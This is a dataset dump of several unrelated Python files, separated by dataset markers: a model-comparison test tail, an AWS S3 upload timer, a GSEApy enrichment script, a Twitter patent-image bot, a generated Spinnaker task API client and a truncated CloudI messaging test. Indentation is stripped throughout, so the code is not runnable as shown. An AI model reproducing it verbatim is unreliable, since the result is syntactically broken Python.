print("model_difference:", max(abs(aold.model[:nv] - anew.model[:nv])))
# Make the models the same before taking a fit step.
aold.model[:nv] = anew.model[:nv]
# Set internal parameters to be similar (to control code execution path).
# aold.config.ax_normalized = False
# anew.config.ax_normalized = False
# aold.config.ay_normalized = False
# anew.config.ay_normalized = False
# aold.config.x_normalized = False
# anew.config.x_normalized = False
# aold.config.y_normalized = False
# anew.config.y_normalized = False
# aold.config.logging_step_frequency = 1
# anew.config.logging_step_frequency = 1
# anew.config.orthogonalizing_step_frequency = 100
anew.config.basis_replacement = False
# anew.config.equalize_y = False
# aold.config.encode_normalization = True
# anew.config.encode_normalization = True
aold.config.num_threads = 1
anew.config.num_threads = 1
steps = 0
ax_old = ax.copy()
x_old = x.copy()
y_old = y.copy()
aold.fit(ax=ax_old, axi=axi, sizes=sizes, x=x_old, xi=xi, y=y_old, steps=steps)
ax_new = ax.copy()
x_new = x.copy()
y_new = y.copy()
anew.fit(ax=ax_new, axi=axi, sizes=sizes, x=x_new, xi=xi, y=y_new, steps=steps)
#
print("model_difference:", max(abs(aold.model[:nv] - anew.model[:nv])))
print()
fy_old = aold(ax=ax_old.copy(), axi=axi, sizes=sizes, x=x_old.copy(), xi=xi, save_states=True)
fy_new = anew(ax=ax_new.copy(), axi=axi, sizes=sizes, x=x_new.copy(), xi=xi, save_states=True)
print("ax_difference: ", abs(ax_old - ax_new).max())
print("as_difference: ", abs(aold.a_states - anew.a_states).max())
print("ay_difference: ", abs(aold.ay - anew.ay).max())
if (x_old.size > 0):
print("x_difference: ", abs(x_old - x_new).max())
print("ms_difference: ", abs(aold.m_states - anew.m_states).max())
print("fy_difference: ", abs(fy_old - fy_new).max())
print()
print("ax_shift: ", abs(aold.rwork[aold.config.aiss-1:aold.config.aise] -
anew.rwork[anew.config.aiss-1:anew.config.aise]).max())
print("ay_shift: ", abs(aold.rwork[aold.config.aoss-1:aold.config.aose] -
anew.rwork[anew.config.aoss-1:anew.config.aose]).max())
print("ay: ", abs(aold.rwork[aold.config.say-1:aold.config.eay] -
anew.rwork[anew.config.say-1:anew.config.eay]).max())
print("y_rescale: ", abs(aold.rwork[aold.config.syr-1:aold.config.eyr] -
anew.rwork[anew.config.syr-1:anew.config.eyr]).max())
print("y_gradient: ", abs(aold.rwork[aold.config.syg-1:aold.config.eyg] -
anew.rwork[anew.config.syg-1:anew.config.eyg]).max())
print()
if (aold.config.ane > 0):
print("a_embeddings: ", abs(aold.unpack().a_embeddings - anew.unpack().a_embeddings).max() )
print("a_input_vecs: ", abs(aold.unpack().a_input_vecs - anew.unpack().a_input_vecs).max() )
print("a_input_shift: ", abs(aold.unpack().a_input_shift - anew.unpack().a_input_shift).max())
print("a_state_vecs: ", abs(aold.unpack().a_state_vecs - anew.unpack().a_state_vecs).max() )
print("a_state_shift: ", abs(aold.unpack().a_state_shift - anew.unpack().a_state_shift).max())
print("a_output_vecs: ", abs(aold.unpack().a_output_vecs - anew.unpack().a_output_vecs).max())
print("m_embeddings: ", abs(aold.unpack().m_embeddings - anew.unpack().m_embeddings).max() )
print("m_input_vecs: ", abs(aold.unpack().m_input_vecs - anew.unpack().m_input_vecs).max() )
print("m_input_shift: ", abs(aold.unpack().m_input_shift - anew.unpack().m_input_shift).max())
print("m_state_vecs: ", abs(aold.unpack().m_state_vecs - anew.unpack().m_state_vecs).max() )
print("m_state_shift: ", abs(aold.unpack().m_state_shift - anew.unpack().m_state_shift).max())
print("m_output_vecs: ", abs(aold.unpack().m_output_vecs - anew.unpack().m_output_vecs).max())
print()
|
StarcoderdataPython
|
4957753
|
<filename>cloud/lab2/push.py
import boto3
from botocore.exceptions import NoCredentialsError
import time
import csv
def upload_to_aws(local_file, bucket, s3_file):
s3 = boto3.client('s3')
try:
s3.upload_file(local_file, bucket, s3_file)
#print("Upload Successful")
return True
except FileNotFoundError:
print("The file was not found")
return False
except NoCredentialsError:
print("Credentials not available")
return False
print("Start timer")
myfile = open('res.csv', 'a')
res ="Region;Size;0;1;2;3;4;5;6;7;8;9;10;11;12;13;14;15;16;17;18;19;20;21;22;23;24;25;26;27;28;29;\n"
for k in range(3):
if(k==0):
bucket_name = 'generatedbucketashrom'
region = 'Stockholm;'
elif(k==1):
bucket_name = 'generatedbucketashromusnorth2'
region = 'Ohio;'
else:
bucket_name = 'generatedbucketashromapsoutheast2'
region = 'Sydney;'
for j in range(3):
if(j == 0):
local_file_name = './dummy_files/1MB.db'
distant_file_name = '1MB.db'
res += region + '1MB;'
elif(j==1):
local_file_name = './dummy_files/10MB.db'
distant_file_name = '10MB.db'
res+= region + '10MB;'
else:
local_file_name = './dummy_files/100MB.bin'
distant_file_name = '100MB.bin'
res+= region + '100Mb;'
for i in range(50):
pre_upload = time.time()
uploaded = upload_to_aws(local_file_name, bucket_name, distant_file_name)
upload_time = time.time() - pre_upload
res = res + str(upload_time) + ";"
print("Uploaded file : " + region + " " + distant_file_name + " " + str(i))
res = res + "\n"
myfile.write(res)
myfile.close()
print("Stop timer")
|
StarcoderdataPython
|
12828985
|
<reponame>sreichl/genomic_region_enrichment
#!/bin/env python
import pandas as pd
import pickle
import os
import numpy as np
import gseapy as gp
# utils for manual odds ratio calculation
def overlap_converter(overlap_str, bg_n, gene_list_n):
overlap_n, gene_set_n = str(overlap_str).split('/')
return odds_ratio_calc(bg_n, gene_list_n, int(gene_set_n), int(overlap_n))
def odds_ratio_calc(bg_n, gene_list_n, gene_set_n, overlap_n):
import scipy.stats as stats
table=np.array([[gene_set_n, bg_n-gene_set_n],[overlap_n, gene_list_n-overlap_n]])
oddsratio, pvalue = stats.fisher_exact(table)
return (1/oddsratio)
# get snakemake parameters
query_genes_path = snakemake.input['query_genes']
background_genes_path = snakemake.input['background_genes']
enrichr_databases = snakemake.input['enrichr_databases']
dir_results = snakemake.output['result_GSEApy']
# testing
# query_genes_path = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/LPS_2h_up/GREAT/GREAT_genes.txt'
# background_genes_path = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/background_genes/BMDM/GREAT_background_genes.txt'
# enrichr_databases = 'resources/enrichr_databases.pkl'
# dir_results = '/nobackup/lab_bock/projects/bmdm-stim/results/ATAC/all/enrichment_analysis/DEA/LPS_2h_up/GSEApy'
if not os.path.exists(dir_results):
os.mkdir(dir_results)
# check if GREAT/Genes.tsv exists & load or handle exception
if os.path.exists(query_genes_path):
genes = open(query_genes_path, "r")
gene_list = genes.read()
gene_list = gene_list.split('\n')
genes.close()
else:
with open(os.path.join(dir_results,"no_genes_found.txt"), 'w') as f:
f.write('no genes found')
quit()
# load background genes
bg_file = open(background_genes_path, "r")
background = bg_file.read()
background = background.split('\n')
bg_file.close()
# load database .pkl file
with open(enrichr_databases, 'rb') as f:
db_dict = pickle.load(f)
# convert gene lists to upper case
gene_list=[str(x).upper() for x in list(gene_list)]
background=[str(x).upper() for x in list(background)]
# perform enrichment of every database with GSEApy (plots are generated automatically)
bg_n = len(background)
res = dict()
for db in db_dict.keys():
res = gp.enrichr(gene_list=gene_list,
gene_sets=db_dict[db],
background=background,
# organism='mouse',
outdir=os.path.join(dir_results, db),
top_term=25,
cutoff=0.05,
format='svg',
verbose=False,
)
# move on if result is empty
if res.results.shape[0]==0:
continue
# annotate used gene set
res.results['Gene_set'] = db
# odds ratio calculation
gene_list_n=len(gene_list)
res.results['Odds Ratio'] = res.results['Overlap'].apply(overlap_converter, args=(bg_n, gene_list_n))
# separate export
res.results.to_csv(os.path.join(dir_results, db, "Enrichr_{}.csv".format(db)))
|
StarcoderdataPython
|
11308513
|
import tweepy
import sqlite3
import os
import tempfile
from PIL import Image
import twitter_credentials
auth = tweepy.OAuthHandler(twitter_credentials.consumer_key, twitter_credentials.consumer_secret)
auth.set_access_token(twitter_credentials.access_token_key, twitter_credentials.access_token_secret)
api = tweepy.API(auth)
db = sqlite3.connect('./catalogue.db')
c = db.cursor()
c.execute('SELECT * FROM image INNER JOIN patent ON patent.id = image.patent_id WHERE tweeted=0 ORDER BY random() LIMIT 1')
r = c.fetchone()
fname = os.path.join('patents', r[4], r[0])
title = r[7]
handle, dest_fname = tempfile.mkstemp('.png')
os.close(handle)
image = Image.open(fname)
image.save(dest_fname)
api.update_with_media(dest_fname, title)
c.execute('UPDATE image SET tweeted=1 WHERE filename=?', [r[0]])
db.commit()
os.remove(dest_fname)
|
StarcoderdataPython
|
1743354
|
<filename>spinnaker_swagger_client/api/task_controller_api.py<gh_stars>0
# coding: utf-8
"""
Spinnaker API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from spinnaker_swagger_client.api_client import ApiClient
class TaskControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def cancel_task_using_put1(self, id, **kwargs): # noqa: E501
"""Cancel task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_task_using_put1(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.cancel_task_using_put1_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.cancel_task_using_put1_with_http_info(id, **kwargs) # noqa: E501
return data
def cancel_task_using_put1_with_http_info(self, id, **kwargs): # noqa: E501
"""Cancel task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_task_using_put1_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method cancel_task_using_put1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `cancel_task_using_put1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks/{id}/cancel', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def cancel_tasks_using_put(self, ids, **kwargs): # noqa: E501
"""Cancel tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_tasks_using_put(ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] ids: ids (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.cancel_tasks_using_put_with_http_info(ids, **kwargs) # noqa: E501
else:
(data) = self.cancel_tasks_using_put_with_http_info(ids, **kwargs) # noqa: E501
return data
def cancel_tasks_using_put_with_http_info(self, ids, **kwargs): # noqa: E501
"""Cancel tasks # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.cancel_tasks_using_put_with_http_info(ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param list[str] ids: ids (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ids'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method cancel_tasks_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'ids' is set
if ('ids' not in params or
params['ids'] is None):
raise ValueError("Missing the required parameter `ids` when calling `cancel_tasks_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'ids' in params:
query_params.append(('ids', params['ids'])) # noqa: E501
collection_formats['ids'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks/cancel', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_task_using_delete(self, id, **kwargs): # noqa: E501
"""Delete task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_task_using_delete(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_task_using_delete_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_task_using_delete_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_task_using_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_task_using_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_task_using_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_task_using_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_task_details_using_get1(self, id, task_details_id, **kwargs): # noqa: E501
"""Get task details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_details_using_get1(id, task_details_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:param str task_details_id: taskDetailsId (required)
:param str x_rate_limit_app: X-RateLimit-App
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_task_details_using_get1_with_http_info(id, task_details_id, **kwargs) # noqa: E501
else:
(data) = self.get_task_details_using_get1_with_http_info(id, task_details_id, **kwargs) # noqa: E501
return data
def get_task_details_using_get1_with_http_info(self, id, task_details_id, **kwargs): # noqa: E501
"""Get task details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_details_using_get1_with_http_info(id, task_details_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:param str task_details_id: taskDetailsId (required)
:param str x_rate_limit_app: X-RateLimit-App
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'task_details_id', 'x_rate_limit_app'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task_details_using_get1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_task_details_using_get1`") # noqa: E501
# verify the required parameter 'task_details_id' is set
if ('task_details_id' not in params or
params['task_details_id'] is None):
raise ValueError("Missing the required parameter `task_details_id` when calling `get_task_details_using_get1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
if 'task_details_id' in params:
path_params['taskDetailsId'] = params['task_details_id'] # noqa: E501
query_params = []
header_params = {}
if 'x_rate_limit_app' in params:
header_params['X-RateLimit-App'] = params['x_rate_limit_app'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks/{id}/details/{taskDetailsId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_task_using_get1(self, id, **kwargs): # noqa: E501
"""Get task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_using_get1(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_task_using_get1_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_task_using_get1_with_http_info(id, **kwargs) # noqa: E501
return data
def get_task_using_get1_with_http_info(self, id, **kwargs): # noqa: E501
"""Get task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_task_using_get1_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: id (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_task_using_get1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_task_using_get1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def task_using_post1(self, map, **kwargs): # noqa: E501
"""Create task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.task_using_post1(map, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object map: map (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.task_using_post1_with_http_info(map, **kwargs) # noqa: E501
else:
(data) = self.task_using_post1_with_http_info(map, **kwargs) # noqa: E501
return data
def task_using_post1_with_http_info(self, map, **kwargs): # noqa: E501
"""Create task # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.task_using_post1_with_http_info(map, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object map: map (required)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['map'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method task_using_post1" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'map' is set
if ('map' not in params or
params['map'] is None):
raise ValueError("Missing the required parameter `map` when calling `task_using_post1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'map' in params:
body_params = params['map']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/tasks', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
StarcoderdataPython
|
6693929
|
<reponame>CloudI/CloudI<filename>src/tests/messaging/messaging.py<gh_stars>100-1000
#!/usr/bin/env python
#-*-Mode:python;coding:utf-8;tab-width:4;c-basic-offset:4;indent-tabs-mode:()-*-
# ex: set ft=python fenc=utf-8 sts=4 ts=4 sw=4 et nomod:
#
# MIT License
#
# Copyright (c) 2012-2021 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
"""
Messaging Integration Test with Python
"""
from __future__ import print_function
import sys
import threading
import traceback
from cloudi import API, TerminateException
class Task(threading.Thread):
"""
messaging thread task
"""
def __init__(self, thread_index, name, terminate):
threading.Thread.__init__(self)
self.__api = None
self.__thread_index = thread_index
self.__name = name
self.__terminate_exception = terminate
def run(self):
"""
run the messaging thread
"""
try:
self.__api = API(self.__thread_index)
self.__api.subscribe('a/b/c/d', self.__sequence1_abcd)
self.__api.subscribe('a/b/c/*', self.__sequence1_abc_)
self.__api.subscribe('a/b/*/d', self.__sequence1_ab_d)
self.__api.subscribe('a/*/c/d', self.__sequence1_a_cd)
self.__api.subscribe('*/b/c/d', self.__sequence1__bcd)
self.__api.subscribe('a/b/*', self.__sequence1_ab__)
self.__api.subscribe('a/*/d', self.__sequence1_a__d)
self.__api.subscribe('*/c/d', self.__sequence1___cd)
self.__api.subscribe('a/*', self.__sequence1_a___)
self.__api.subscribe('*/d', self.__sequence1____d)
self.__api.subscribe('*', self.__sequence1_____)
self.__api.subscribe('sequence1', self.__sequence1)
self.__api.subscribe('e', self.__sequence2_e1)
self.__api.subscribe('e', self.__sequence2_e2)
self.__api.subscribe('e', self.__sequence2_e3)
self.__api.subscribe('e', self.__sequence2_e4)
self.__api.subscribe('e', self.__sequence2_e5)
self.__api.subscribe('e', self.__sequence2_e6)
self.__api.subscribe('e', self.__sequence2_e7)
self.__api.subscribe('e', self.__sequence2_e8)
self.__api.subscribe('sequence2', self.__sequence2)
self.__api.subscribe('f1', self.__sequence3_f1)
self.__api.subscribe('f2', self.__sequence3_f2)
self.__api.subscribe('g1', self.__sequence3_g1)
self.__api.subscribe('sequence3', self.__sequence3)
if self.__thread_index == 0:
# start sequence1
self.__api.send_async(
self.__api.prefix() + 'sequence1', b'1',
)
result = self.__api.poll()
assert result is False
except self.__terminate_exception:
pass
except Exception:
traceback.print_exc(file=sys.stderr)
print('terminate messaging %s' % self.__name)
def __sequence1_abcd(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/b/c/d')
assert request == b'test1'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_abc_(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/b/c/*')
assert request == b'test2' or request == b'test3'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_ab_d(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/b/*/d')
assert request == b'test4' or request == b'test5'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_a_cd(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/*/c/d')
assert request == b'test6' or request == b'test7'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1__bcd(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + '*/b/c/d')
assert request == b'test8' or request == b'test9'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_ab__(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/b/*')
assert request == b'test10'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_a__d(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/*/d')
assert request == b'test11'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1___cd(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + '*/c/d')
assert request == b'test12'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_a___(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + 'a/*')
assert request == b'test13'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1____d(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + '*/d')
assert request == b'test14'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1_____(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
assert pattern == (self.__api.prefix() + '*')
assert request == b'test15'
self.__api.return_(request_type, name, pattern,
b'', request, timeout, trans_id, pid)
def __sequence1(self, request_type, name, pattern,
request_info, request,
timeout, priority, trans_id, pid):
# pylint: disable=unused-argument
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
